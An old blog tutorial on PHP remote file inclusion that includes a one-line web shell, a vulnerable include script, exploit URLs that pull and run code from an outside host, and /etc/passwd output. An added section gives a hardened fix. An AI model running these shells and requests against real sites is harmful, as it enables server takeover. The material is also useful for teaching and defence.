Friday, November 16, 2007 at 9:20 AM



We often come across websites with an RFI (remote file inclusion) bug, exploited by a variety of methods, and that raises the question: why does this happen?
It happens because the source code is public and widely circulated, so anyone can study and analyse a CMS (Content Management System). In fact, include in PHP is not itself a bug but a function for pulling in other library files.
An example:


<?php
/*************************************
* project : test include
* file name : var.php
************************************
*/
$a = 10;
$b = 3;
?>


<?php
/*************************************
* project : test include
* file name : add.php
************************************
*/
include("var.php"); // brings $a and $b from var.php into this script
$s_add = $a + $b;
print $a." + ".$b." = ".$s_add;
?>

When you run add.php you get the output 10 + 3 = 13.
Easy, isn't it?
Another example:


<?php
/*************************************
* project : test include
* file name : passwd.php
************************************
*/
include("/etc/passwd"); // not PHP code, so the file's contents go straight to the output
?>


Running the script passwd.php produces output like the following:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...

And of course the site will also fetch a URL when the include is handed an address on another host, like:


<?php
/*************************************
* project : test include
* file name : httP://www.youdomain.com/shell.txt
************************************
*/

system($cmd); // runs the value of $cmd as a shell command
?>


<?php
/*************************************
* project : test include
* file name : httP://www.target.com/vul.php
************************************
*/

// $path_include is never assigned in this script before it is used
include($path_include."include/config.inc.php");
print $head;
// bla...bla...bla...
?>

Because vul.php does not filter its input, the script is already a security hole, and with the request http://www.target.com/vul.php?path_include=http://www.youdomain.com/shell.txt an intruder gains command access.
Let us try it out with the request:

http://www.target.com/vul.php?cmd=cat%20/ect/passwd&path_include=httP://www.youdomain.com/shell.txt

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...

http://www.target.com/vul.php?cmd=ls%20-lia&path_include=httP://www.youdomain.com/shell.txt

28 -rwxr-xr-x 1 john john 25141 Oct 30 2006 archive.php
4 -rw-r--r-- 1 john john 522 Sep 10 05:38 config.inc.php
4 -rwxr-xr-x 1 john john 510 Oct 30 2006 config.inc.php.sample
8 -rwxr-xr-x 1 john john 5724 Oct 30 2006 crop.inc.php
8 -rwxr-xr-x 1 john john 5014 Oct 30 2006 debugger.inc.php
4 -rwxr-xr-x 1 john john 213 Oct 30 2006 vul.php

In this way we have gained command access.
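
A hardened form of vul.php, as an added example that is not part of the original post: the include prefix is a constant instead of the unassigned $path_include, and the resolved path must stay inside the application directory. APP_ROOT, safe_include_path() and the directory layout are assumptions; the remote fetch shown above also depends on PHP being allowed to include URLs (allow_url_include, off by default since PHP 5.2).

```php
<?php
// Added example, not code from the original post. APP_ROOT,
// safe_include_path() and the directory layout are assumptions.

// The original script used $path_include without assigning it, so the request
// could fill it in (register_globals on). A constant cannot be overwritten by
// GET, POST or cookie data.
define('APP_ROOT', __DIR__);

/**
 * Return the absolute path of $relative under $root, or null when it does
 * not exist or resolves outside $root (through "..", a symlink or a wrapper).
 */
function safe_include_path(string $root, string $relative): ?string
{
    // Reject stream wrappers such as http://, ftp://, php:// and data:
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check on the fully resolved path.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Fail closed if the interpreter would let include() fetch URLs.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    exit('allow_url_include must be Off');
}

$config = safe_include_path(APP_ROOT, 'include/config.inc.php');
if ($config === null) {
    exit('configuration file not found');
}
include $config;
print $head; // $head is expected to be set by config.inc.php, as in the original
```

With this version the path_include parameter in the requests above is ignored, because nothing in the script reads it.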
That is all for this article from me; I hope it is useful.
Sorry if this article is not very good, because I still have a lot to learn.

Posted by admin

Copyright 2007, pirate-unsecure